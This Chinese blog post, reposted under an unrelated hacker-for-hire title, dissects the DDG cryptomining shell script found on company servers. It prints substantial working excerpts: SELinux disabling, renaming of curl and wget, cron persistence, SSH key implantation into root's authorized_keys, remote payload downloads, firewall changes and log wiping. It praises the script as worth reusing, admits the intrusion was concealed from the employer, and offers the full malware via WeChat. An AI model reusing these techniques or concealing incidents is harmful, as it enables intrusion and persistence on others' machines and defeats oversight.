黑客24小时在线接单网站

本文转载自微信公众号 小姐姐味道」，转载本文请联系 小姐姐味道公众号。

公司有几台机器，最近cpu一直在疯转，就像是吃了春药，一直在发热。由于机器实在是太多，有这么几台安全性防护没有到位，就一直躺在角落里疯狂运转。

直到统一的监控脚本接管了这几台机器，异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程，发现是一个挖矿脚本。下载下来学习了一下，发现脚本的编写者，有着较高的水平。虽然在别人机器进行挖矿行为是不道德的，但掩盖不了脚本编写者的风骚操作。

挖矿，是计算机技术界最让人迷惑的行为之一，但它赚钱。据悉，这段脚本名叫DDG，已经挖取了价值一千多万人民币的虚拟币货币。

本着学习的目的，我稍微分析了一下这个神奇的脚本，也算是吸尽它的精华，为我所用。这事我都没敢告诉老板，因为说了他也不懂，反生事端。不过和大家交流一下还是可以的，因为你们懂啊。

code 1

#!/bin/sh

脚本的第一行，看起来是一行注释，但其实并不是。它规定了接下来的脚本，将要采用哪一个SHELL执行。像我们平常用的bash、zsh等，属于sh的超集，这个脚本使用sh作为执行的shell，具有更好的可移植性。

code 2

setenforce02>dev/null

echoSELINUX=disabled>/etc/sysconfig/selinux2>/dev/null

setenforce是Linux的selinux防火墙配置命令，执行setenforce 0 表示关闭selinux防火墙。2代表的是标准错误(stderr)的意思。所以后面，使用重定向符，将命令的错误输出定向到/dev/null设备中。这个设备是一个虚拟设备，意思是什么都不干。非常适合静悄悄的干坏事。

code 3

sync&&echo3>/proc/sys/vm/drop_caches

脚本贴心的帮我们释放了一些内存资源，以便获取更多的资源进行挖矿。

众所周知，Linux系统会随着长时间的运行，会产生很多缓存，清理方式就是写一个数字到drop_caches文件里，这个数字通常为3。sync命令将所有未写的系统缓冲区写到磁盘中，执行之后就可以放心的释放缓存了。

code 4

crondir='/var/spool/cron/'"$USER"

cont=`cat${crondir}`

ssht=`cat/root/.ssh/authorized_keys`

echo1>/etc/sysupdates

rtdir="/etc/sysupdates"

bbdir="/usr/bin/curl"

bbdira="/usr/bin/cur"

ccdir="/usr/bin/wget"

ccdira="/usr/bin/wge"

mv/usr/bin/wget/usr/bin/get

mv/usr/bin/xget/usr/bin/get

mv/usr/bin/get/usr/bin/wge

mv/usr/bin/curl/usr/bin/url

mv/usr/bin/xurl/usr/bin/url

mv/usr/bin/url/usr/bin/cur

没错，上面这些语句就是完成了一些普通的操作。值得注意的是，它把我们的一些常用命令，使用mv命令给重名了。这在执行命令的时候，就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件，属于犯罪的范畴了。

脚本为了复用一些功能，抽象出了很多的函数。我们直接跳到main函数的执行，然后看一下这个过程。

code 5

首先是kill_miner_proc函数。代码很长，就不全部贴出来了。

kill_miner_proc()

{

psauxf|grep-vgrep|grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9

...

pkill-fbiosetjenkins

pkill-fLoopback

...

crontab-r

rm-rf/var/spool/cron/*

挖矿领域是一个相爱相杀的领域。这个方法首先使用ps、grep、kill一套组合，干掉了同行的挖矿脚本，然后停掉了同行的cron脚本，黑吃黑的感觉。

在这段脚本里，使用了pkill命令。这个命令会终止进程，并按终端号踢出用户，比较暴力。

code 6

接下来执行的是kill_sus_proc函数。

psaxf-o"pid"|whilereadprocid

do

...

done

ps加上o参数，可以指定要输出的列，在这里只输出的进程的pid，然后使用read函数，对procid进行遍历操作。

code 7

ls-l/proc/$procid/exe|grep/tmp

if[$?-ne1]

then

...

fi

上面就是遍历操作过程了，我们可以看到if语句的语法。其中$?指的是上一个命令的退出状态。0表示没有错误，其他任何值表明有错误。-ne是不等于的意思，意思就是能够匹配到tmp这个字符串。

code 8

psaxf-o"pid%cpu"|awk'{if($2>=40.0)print$1}'|whilereadprocid

do

...

done

呵呵，上面又来了一次循环遍历。不过这次针对的目标，是cpu使用超过40%的进程。读过xjjdog对awk分析的同学，对这个命令应该非常的熟悉。这就有点狠了：影响我挖矿的进程，都得死!

相煎何太急。

code 9

再接下来，脚本针对不同的用户属性，进行了不同的操作。

首先是root用户。通过判断是否存在$rtdir文件，来确定是否是root权限。

chattr-i/etc/sysupdate*

chattr-i/etc/config.json*

chattr-i/etc/update.sh*

chattr-i/root/.ssh/authorized_keys*

chattr-i/etc/networkservice

使用chattr命令，把一些重要的文件，搞成不能任意改动的只读属性，也是够损的。然后，操作cron程序，把脚本的更新服务加入到定时中。

就是下面这段脚本。

code 10

if[!-f"/usr/bin/crontab"]

then

echo"*/30****sh/etc/update.sh>/dev/null2>&1">>${crondir}

else

[[$cont=~"update.sh"]]||(crontab-l;echo"*/30****sh/etc/update.sh>/dev/null2>&1")|crontab-

fi

注意[[ $cont =~ "update.sh" ]]这以小段代码，怪异的很。[[ ]]是shell中内置的一个命令，支持字符串的模式匹配。使用=~的时候，甚至支持shell的正则表达式，强大的令人发指。它的输出结果是一个bool类型，所以能够使用||进行拼接。

而后面的单小括号 ()，是的是一个命令组，括号中多个命令之间用分号隔开，最后一个命令可以没有分号;和`cmd`的效果基本是一样的。

code 11

搞完了定时任务，就要配置ssh自动登录了，通过把公钥追加到信任列表中就可以。

chmod700/root/.ssh/

echo>>/root/.ssh/authorized_keys

chmod600root/.ssh/authorized_keys

echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

code 12

说曹操曹操就到，下面的脚本就使用了``进行操作。

filesize_config=`ls-l/etc/config.json|awk'{print$5}'`

if["$filesize_config"-ne"$config_size"]

then

pkill-fsysupdate

rm/etc/config.json

downloads$config_url/etc/config.json$config_url_backup

else

echo"noneeddownload"

fi

通过一系列骚操作，获取到配置文件的大小，如果判断文件大小不一致，那么就重新下载一个。这就用到了downloads函数。

shell中的函数，看起来比较怪异，后面的参数传递，就像是脚本传递一样，传送给函数。

code 13

downloads$config_url/etc/config.json$config_url_backup

这句话，就传递了三个参数。

当然，文件要从遥远的服务器上下载。域名是.de结尾的，证明是个德国的域名，其他的我们一无所知。

downloads()

{

if[-f"/usr/bin/curl"]

then

echo$1,$2

http_code=`curl-I-m10-o/dev/null-s-w%{http_code}$1`

if["$http_code"-eq"200"]

then

curl--connect-timeout10--retry100$1>$2

elif["$http_code"-eq"405"]

then

curl--connect-timeout10--retry100$1>$2

else

curl--connect-timeout10--retry100$3>$2

fi

elif[-f"/usr/bin/cur"]

then

http_code=`cur-I-m10-o/dev/null-s-w%{http_code}$1`

if["$http_code"-eq"200"]

then

cur--connect-timeout10--retry100$1>$2

elif["$http_code"-eq"405"]

then

cur--connect-timeout10--retry100$1>$2

else

cur--connect-timeout10--retry100$3>$2

fi

elif[-f"/usr/bin/wget"]

then

wget--timeout=10--tries=100-O$2$1

if[$?-ne0]

then

wget--timeout=10--tries=100-O$2$3

fi

elif[-f"/usr/bin/wge"]

then

wge--timeout=10--tries=100-O$2$1

if[$?-eq0]

then

wge--timeout=10--tries=100-O$2$3

fi

fi

}

我认为，这段代码作者写的又臭又长，完全没有体现出自己应有的水平。应该是赶工期，没有想好代码的复用，才会写的这么有失水准。

我们上面说到，脚本改了几个命令的名字，其中就有curl。这个命令是如此的强大，以至于脚本的作者都忍不住加了不少参数。

• -I 是用来测试http头信息
• -m 设置最大传输时间
• -o 指定保持的文件名。这里是/dev/null，呃呃呃
• -s 静默模式。不输出任何东西
• --connect-timeout 连接超时时间
• --retry 重试次数，好狠100次

如果没有curl?那就使用替补的wget，套路都是一样的。

code 14

接下来是一系列相似的操作，最后，对iptables一批操作。

iptables-F

iptables-X

iptables-AOUTPUT-ptcp--dport3333-jDROP

iptables-AOUTPUT-ptcp--dport5555-jDROP

iptables-AOUTPUT-ptcp--dport7777-jDROP

iptables-AOUTPUT-ptcp--dport9999-jDROP

iptables-IINPUT-s43.245.222.57-jDROP

serviceiptablesreload

code 15

细心的脚本编写者，还使用命令清理了操作日志。

history-c

echo>/var/spool/mail/root

echo>/var/log/wtmp

echo>/var/log/secure

echo>/root/.bash_history

不露死角，潇洒走开。

可以看到，且不说真正的挖矿程序，仅仅是这个小脚本，作者也下足了功夫。脚本里命令繁多，使用方式多样，缩紧格式优雅，除了有一点啰嗦，没有加密之外，是一个非常好的拿来学习的脚本。

瞧了瞧被控制的机器，我赶紧偷偷的重装了机器。

就当它是一个梦吧。老板问起的时候，什么都没有发生过。

有需要拿到完整脚本的同学。关注xjjdog微信公众号，回复wkjb，即可获取。

作者简介：小姐姐味道 (xjjdog)，一个不允许程序员走弯路的公众号。聚焦基础架构和Linux。十年架构，日百亿流量，与你探讨高并发世界，给你不一样的味道。我的个人微信xjjdog0，欢迎添加好友，进一步交流。